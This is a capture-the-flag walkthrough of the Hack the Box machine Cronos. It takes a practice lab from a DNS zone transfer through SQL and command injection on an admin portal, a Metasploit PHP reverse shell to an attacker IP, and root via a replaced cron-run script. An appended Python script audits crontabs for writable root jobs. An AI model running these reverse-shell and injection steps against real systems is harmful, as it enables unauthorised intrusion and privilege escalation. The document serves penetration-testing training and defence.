Hack the Box Challenge: Cronos Walkthrough
March 27, 2018 By Raj Chandel
Today we are going to solve another CTF challenge, “Cronos”, which is available online for those who want to improve their penetration testing skills. Cronos is a retired vulnerable lab presented by Hack the Box for practising penetration testing online according to your experience level; they have a collection of vulnerable labs as challenges ranging from beginner to expert level. We are going to start a new Hack the Box series, beginning with Cronos, which is designed for beginners.
Task: find the user.txt and root.txt files on the victim’s machine.
Since these labs are available online, they have static IPs; the IP of this lab is 10.10.10.13, so let’s begin with nmap port enumeration.
nmap -A 10.10.10.13
As the image below shows, ports 22, 53 and 80 are open on the victim’s network.
Knowing that port 80 is open on the victim’s network, we explored this IP in a browser but didn’t get any remarkable clue for the next step. It only showed that the Apache HTTP Server is working properly.
Next, we added the domain name of the target machine to the /etc/hosts file so that the webpage can be accessed by domain name as well as by IP address.
Knowing that port 53 is open, we used the command host -l cronos.htb 10.10.10.13 to check the DNS service running on this IP. It gave us a clue for our next step: another domain name, admin.cronos.htb.
We then added the new domain name found in the previous step to the /etc/hosts file, so that this webpage can also be accessed by both IP address and domain name.
Now open https://admin.cronos.htb in the browser. It turned out to be a login portal asking for a username and password. In a situation like this, we would generally try brute forcing or SQL injection. After long hours of trying, we finally got in by using a SQL injection string in the Username field and entering any random number in the Password field.
With the previous step we successfully logged into this portal, and the page that opened is shown below.
At this point we tried command injection by appending ; ls, as shown below, which listed some .php files.
We then used the Metasploit module exploit/multi/script/web_delivery and got a meterpreter session, as you can see below.
msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 1
msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.3
msf exploit(multi/script/web_delivery) > set lport 8082
msf exploit(multi/script/web_delivery) > exploit
Next, we pasted the copied command and clicked on execute.
That gave us our first session, along with a meterpreter shell. Once we had the meterpreter, we used the command cd /home to check which directories are in home. Then we looked inside the noulis directory using the command ls /home/noulis; here we found the user.txt file and used cat user.txt to read its content, which contains our first FLAG!!
After that, we used the command cat crontab to view the contents of the crontab. By viewing the crontab we saw a PHP file that has been scheduled and gets executed every time.
So we thought of downloading this file to our Desktop by using the command
download /var/www/laravel/artisan /root/Desktop/
Next, we took a default web shell named php-reverse-shell.php and edited it in a text editor. We changed the IP to our local host IP, changed the port to 1234, and clicked Save. We also changed the name of this file to artisan, which was the name of the file we downloaded earlier.
It’s time to upload this file, artisan.php, to the same location from which we downloaded the original artisan file. The command used for this is
upload /root/Desktop/artisan.php /var/www/laravel/artisan
Next, we started a netcat listener using the command nc -lvp 1234. As per the crontab, the scheduled artisan.php would be executed when its turn came up. After a few minutes the file was executed; we then used the command ls to look for a directory named root. The command used to view the contents of the root directory is cat /root. We found the root.txt file, and by using the command cat /root.txt we found the final flag!!
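The final step worked because the scheduled artisan file could be overwritten from the low-privileged session. As an added example (not part of the original walkthrough), this Python check audits /etc/crontab-style entries that run as root and reports any referenced file, or its parent directory, that an untrusted account can modify; the function names, the sample crontab line and the demo file are constructed for illustration.

```python
import os
import shlex
import stat
import tempfile

def untrusted_write(path, trusted_uids):
    """Return why an untrusted account can modify `path`, or None."""
    st = os.stat(path)
    if st.st_uid not in trusted_uids:
        return f"owned by uid {st.st_uid}"
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return f"group/world-writable (mode {stat.S_IMODE(st.st_mode):o})"
    return None

def audit_crontab(text, trusted_uids=frozenset({0})):
    """Scan /etc/crontab-style text; return (user, path, reason) for root jobs."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        n_time = 1 if fields[0].startswith("@") else 5
        if len(fields) < n_time + 2 or fields[n_time] != "root":
            continue  # env assignment, malformed line, or non-root job
        command = " ".join(fields[n_time + 1:])
        try:
            tokens = shlex.split(command)
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            tokens = command.split()
        for token in tokens:
            if not (token.startswith("/") and os.path.isfile(token)):
                continue  # only existing absolute file paths are checked
            for target in (token, os.path.dirname(token)):
                reason = untrusted_write(target, trusted_uids)
                if reason:
                    findings.append(("root", target, reason))
    return findings

if __name__ == "__main__":
    # Constructed demo: a stand-in for /var/www/laravel/artisan with weak permissions.
    demo_dir = tempfile.mkdtemp()
    script = os.path.join(demo_dir, "artisan")
    open(script, "w").close()
    os.chmod(script, 0o666)
    sample = f"* * * * * root php {script} schedule:run >> /dev/null 2>&1"
    for user, path, reason in audit_crontab(sample, trusted_uids={os.getuid()}):
        print(f"{user} job uses {path}: {reason}")
```

On a real host, pass the contents of /etc/crontab and keep the default trusted_uids so that only root-owned, non-group/world-writable files and directories pass.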